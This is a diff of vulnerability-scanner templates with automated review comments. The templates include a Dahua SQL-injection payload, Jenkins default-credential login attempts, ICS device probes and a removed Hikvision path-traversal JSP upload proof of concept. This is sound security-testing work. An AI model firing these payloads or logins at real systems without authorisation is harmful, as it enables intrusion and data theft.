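Review bot: Replacing `metadata: shodan-query:` with a bare `reference:` URL in the wowza-streaming-detect hunk loses the structured query that tooling reads from `metadata`; keep both, restoring `metadata:` with `shodan-query: http.title:"Manager" product:"Wowza Streaming Engine"` next to the new reference, and write `reference:` as a list as the other templates in this commit do. `requests:` here is also the legacy key this commit elsewhere migrates to `http:`.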
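Review bot: In the frontpage-exposure hunk the second and third paths, `"{{BaseURL}}_vti_pvt/administrators.pwd"` and `"{{BaseURL}}_vti_pvt/authors.pwd"`, lack the `/` that the first path has; since `{{BaseURL}}` normally has no trailing slash these requests go to a mangled host/path and never reach the file. Change them to `- "{{BaseURL}}/_vti_pvt/administrators.pwd"` and `- "{{BaseURL}}/_vti_pvt/authors.pwd"`. The word matcher with `condition: and` also demands all three of `admin`, `webmaster` and `administrator` in one response, which seems stricter than these one-entry-per-line files usually allow — `condition: or` is probably what was intended and is worth verifying against a sample.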
diff --git a/poc/java/jboss-web-console.yaml b/poc/java/jboss-web-console.yaml old mode 100755 new mode 100644 index 8333db7f7b..87264c77fe --- a/poc/java/jboss-web-console.yaml +++ b/poc/java/jboss-web-console.yaml @@ -1,30 +1,22 @@ id: jboss-web-console info: name: JBoss Management Console Server Information - author: - - l0ne1y - description: |- - JBoss管理控制台服务器信息泄露漏洞 - 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + author: dhiyaneshDK severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - https://jbossweb.jboss.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + reference: + - https://www.exploit-db.com/ghdb/5215 + tags: jboss,unauth requests: -- matchers: - - type: word - condition: and - words: - - Application Server - - Management Console - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/web-console/ServerInfo.jsp' - method: GET + - method: GET + path: + - "{{BaseURL}}/web-console/ServerInfo.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Application Server" + - "Management Console" + condition: and + - type: status + status: + - 200 diff --git a/poc/jenkins/jenkins-weak-password.yaml b/poc/jenkins/jenkins-weak-password.yaml old mode 100755 new mode 100644 index 84d3b8f678..08508605ce --- a/poc/jenkins/jenkins-weak-password.yaml +++ b/poc/jenkins/jenkins-weak-password.yaml 
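Review bot: The rewritten jboss-web-console template has no `description:` at all — the old Chinese description and remediation are removed and nothing in English replaces them — so a scanner reports this finding with only a name. Add one line under `severity:`, e.g. `description: JBoss web-console ServerInfo.jsp is reachable without authentication and discloses application server details.`, which is what the `unauth` tag and the matched page imply. `requests:` is the legacy key this same commit migrates to `http:` in other files.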
@@ -1,45 +1,52 @@ id: jenkins-weak-password info: name: Jenkins Default Login - author: - - l0ne1y - tags: - - jenkins - - default-login - description: |- - Jenkins 默认口令登录漏洞 - CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。其管理后台存在默认账户admin/admin,攻击者可通过默认账户登录后台实施高危操作。 + author: Zandros0 severity: high + tags: jenkins,default-login + description: Jenkins default admin login information was discovered. classification: - cwe-id: - - cwe-522 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - remediation: |- - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 - 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 - 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 - 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) - 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) + cve-id: + cwe-id: CWE-522 requests: -- matchers: - - type: dsl - condition: and - dsl: - - contains(body_3, "/logout") - - contains(body_3, "Dashboard [Jenkins]") - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - | - POST /j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - - | - GET / HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - req-condition: true + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: {{cookie}} + attack: pitchfork + payloads: + username: + - admin + - jenkins + password: + - admin + - password + extractors: + - type: regex + name: cookie + internal: true + part: header 
+ regex: + - 'JSESSIONID\..*=([a-z0-9.]+)' + req-condition: true + matchers: + - type: dsl + condition: and + dsl: + - 'contains(body_3, "/logout")' + - 'contains(body_3, "Dashboard [Jenkins]")' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml 
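Review bot: `cve-id:` under `classification:` is left without a value, which parses to a null field and misleads since no CVE exists for a default credential; remove that line and keep `cwe-id: CWE-522`. The cookie extractor `JSESSIONID\..*=([a-z0-9.]+)` appears to rely on the extractor's default group so that `{{cookie}}` becomes the whole `JSESSIONID.<suffix>=<value>` match, and its `[a-z0-9.]` class silently drops any session id containing uppercase characters; `JSESSIONID\.[^=]+=([A-Za-z0-9.]+)` used the same way is safer. The trailing `# Enhanced by mp on 2022/03/10` line is added here while the other files in this commit replace such comments with `# digest:` lines, so it will be out of step with the rest of the tree.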
@@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + 
- type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 77936cf562..78d89c1465 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,31 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" + + http: - method: GET path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" matchers-condition: and matchers: - type: word part: body words: - - "loginName" - - "loginPass" + - "c4ca" - type: status status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action + - 500 diff --git a/poc/other/gavazzi-automation.yaml b/poc/other/gavazzi-automation.yaml new file mode 100644 index 0000000000..e848d1cab3 --- /dev/null +++ b/poc/other/gavazzi-automation.yaml 
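Review bot: The `author:` line in the Hikvision hunk is corrupted to `zerZero Trust Security Attack and Defense Laboratoryo` (a paste over the previous value); restore `author: Zero Trust Security Attack and Defense Laboratory`. The content now describes an `/artemis-portal/artemis/env` information-disclosure check, yet `id: HiKVISION` is unchanged and the file still lives at `Hikvision_iVMS-8700_Fileupload_report.yaml`, so id and path no longer say what the template does; give it a specific id such as `hikvision-ivms-8700-env-disclosure` and rename the file. A single `profiles` word in the body is a thin match; also requiring a JSON content-type header would cut false positives.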
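Review bot: As in the Hikvision hunk above, the Dahua template is rewritten for a different endpoint (getFaceCapture) but `id: Dahua` and the filename `Dahua_getUserInfoByUserName.yaml` stay, so id and path now mislabel an SQL-injection check; use a specific id like `dahua-smart-park-getfacecapture-sqli` and rename the file. The body matcher `"c4ca"` is only four characters of the expected md5(1) output and can appear in unrelated 500 pages; matching the full `c4ca4238a0b923820dcc509a6f75849b` avoids those false positives. The extra blank lines added before `http:` are harmless but inconsistent with the sibling templates.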
@@ -0,0 +1,87 @@ +id: gavazzi-automation + +info: + name: gavazzi-automation-UWP-3.0-WebApp + author: Redflare-cyber + severity: info + description: Login for UWP 3.0 Web Application by Gavazzi Automation was detected on target host. + reference: + - https://www.gavazziautomation.com/en-global/ + - https://github.com/edoardottt/favirecon + metadata: + max-request: 2 + fofa-query: icon_hash="2103098667" && title=="UWP3.0 Web" + tags: scada,iiot,ics,tech,favicon + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + - "{{BaseURL}}/assets/icons/apple-icon-57x57.png" + - "{{BaseURL}}/assets/icons/apple-icon-120x120.png" + - "{{BaseURL}}/assets/icons/apple-icon-180x180.png" + - "{{BaseURL}}/assets/icons/android-icon-192x192.png" + - "{{BaseURL}}/assets/icons/favicon-32x32.png" + - "{{BaseURL}}/assets/icons/favicon-96x96.png" + - "{{BaseURL}}/assets/icons/favicon-16x16.png" + + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + name: "gavazzi1" + dsl: + - "status_code==200 && (\"-1740901199\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi2" + dsl: + - "status_code==200 && (\"-653070107\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi3" + dsl: + - "status_code==200 && (\"-1303468522\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi3" + dsl: + - "status_code==200 && (\"712041840\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi4" + dsl: + - "status_code==200 && (\"2134643867\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi4" + dsl: + - "status_code==200 && (\"-993331329\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi5" + dsl: + - "status_code==200 && (\"576329580\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi6" + dsl: + - "status_code==200 && (\"2103098667\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi7" + dsl: + - "status_code==200 && (\"2103098667\" == 
mmh3(base64_py(body)))" + + + extractors: + - type: dsl + dsl: + - 'mmh3(base64_py(body))' diff --git a/poc/other/intank-iiot.yaml b/poc/other/intank-iiot.yaml new file mode 100644 index 0000000000..5364c47828 --- /dev/null +++ b/poc/other/intank-iiot.yaml @@ -0,0 +1,43 @@ +id: in-tank-inventory-tcp-detection + +info: + name: In-Tank Inventory Detection + author: Redflare Cyber + severity: medium + description: This template detects systems running an in-tank inventory service on TCP port 10001 by sending the I20100 command and analyzing the response. + reference: + - https://github.com/sjhilt/Nmap-NSEs/blob/master/atg-info.nse + metadata: + shodan-query: '"in-tank-inventory" port:10001' + tags: iiot,ics,scada,exposure + +tcp: + - host: + - "{{Hostname}}" + port: 10001 + + inputs: + - data: "\x01I20100\n" + read-size: 1024 + + matchers: + - type: regex + regex: + - "(?i)IN-TANK INVENTORY" + part: body + + - type: regex + regex: + - "^SEP\\s\\d{2},\\s\\d{4}" # Example date format in the response + part: body + + - type: word + words: + - "TANK PRODUCT" + part: body + + extractors: + - type: regex + regex: + - "(?m)TANK PRODUCT.*$" + diff --git a/poc/other/siemens-simatic.yaml b/poc/other/siemens-simatic.yaml new file mode 100644 index 0000000000..20cea49793 --- /dev/null +++ b/poc/other/siemens-simatic.yaml 
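Review bot: Matcher names in the gavazzi-automation hunk are duplicated (`gavazzi3` and `gavazzi4` each appear twice) and `gavazzi6` and `gavazzi7` test the same hash `2103098667`, so one matcher is redundant and the duplicated names make the output ambiguous about which icon matched; renumber them consecutively and drop the repeated hash. `max-request: 2` understates the nine paths listed (they are tried until `stop-at-first-match`), so `max-request: 9` is the honest bound. The tag casing `iiot` here differs from `IIoT` in sibling templates of this commit; one spelling is easier to filter on.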
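Review bot: In the intank-iiot hunk the second regex `^SEP\\s\\d{2},\\s\\d{4}` matches only a September date and, anchored with `^` but without `(?m)`, only at the very start of the body, so it is both month-specific and position-sensitive; a generic form such as `(?m)^[A-Z]{3}\\s+\\d{1,2},\\s+\\d{4}` matches the same banner layout year-round. No `matchers-condition` is set, so any single regex — including that date — is enough to report an in-tank inventory system; `matchers-condition: and`, or at least requiring the `IN-TANK INVENTORY` regex, keeps the detection honest.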
@@ -0,0 +1,34 @@
+id: siemens-plc-detect
+
+info:
+ name: Siemens PLC - Detect
+ author: Redflare-Cyber
+ severity: info
+ description: |
+ A Siemens PLC has been potentially detected.
+ Heuristics in the response indicate a possible Siemens PLC installation.
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: Siemens
+ product: siemens
+ shodan-query:
+ - html:"Overview - Siemens, SIMATIC"
+ - http.html:"overview - siemens, simatic"
+ fofa-query: body="overview - siemens, simatic"
+ tags: siemens,scada,IIoT,cti,network,tcp
+tcp:
+ - inputs:
+ - data: "0300001611e00000000400c1020100c2020102c0010a"
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ port: 102
+ read-size: 1024
+
+ matchers:
+ - type: binary
+ binary:
+ - "0300001611d00004000100c1020100c2020102c0010a"
+ - "0300001611d00004443100c0010ac1020100c2020102"
diff --git a/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml b/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml
new file mode 100644
index 0000000000..acb2e1119b
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml
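Review bot: The two `binary:` entries are complete 22-byte COTP Connection Confirm frames, including the source reference the device chooses (`0001` in the first, `4431` in the second) and one particular parameter order, so a PLC that picks another reference or orders the `c0`/`c1`/`c2` parameters differently is missed. Matching the stable parts — the TPKT/COTP CC prefix and the two TSAP parameters the probe itself sent — with `condition: and` covers both existing patterns and the variants (fenced below). Separately, `product: siemens` merely repeats `vendor`, and the `shodan-query`/`fofa-query` values describe the HTTP status page rather than the port-102 probe this template performs, which deserves a short comment in `metadata:`.
```yaml
  matchers:
    - type: binary
      binary:
        - "0300001611d0"   # TPKT header + COTP Connection Confirm
        - "c1020100"       # src-tsap parameter echoed from the probe
        - "c2020102"       # dst-tsap parameter echoed from the probe
      condition: and
```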
@@ -0,0 +1,59 @@
+id: woocommerce-multiple-free-gift
+
+info:
+ name: >
+ WooCommerce Multiple Free Gift <= 1.2.3 - Insufficient Server-Side Validation to Arbitrary Gift Adding
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-multiple-free-gift/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-multiple-free-gift/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woocommerce-multiple-free-gift,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-multiple-free-gift/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-multiple-free-gift"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/sql/mass-sqli.yaml b/poc/sql/mass-sqli.yaml
new file mode 100644
index 0000000000..d41cf43580
--- /dev/null
+++ b/poc/sql/mass-sqli.yaml
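Review bot: `description: >` is empty, `cvss-metrics:`, `cvss-score:` and `cve-id:` carry no values, and `shodan-query: 'vuln:'` is an unfilled placeholder, so the template ships with null classification fields; either fill them from the Wordfence reference or remove the empty keys. The `tags:` list includes `cve` although no CVE id is given, and the file sits under `poc/remote_code_execution/` while the name describes insufficient server-side validation allowing arbitrary gift adding, not code execution — a neutral directory such as `poc/other/` would not mislabel the severity. The version check itself (`compare_versions(version, '<= 1.2.3')` over the readme's Stable tag) is fine.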
@@ -0,0 +1,476 @@ +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli,generic,error + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - 
"Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - 
"Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + 
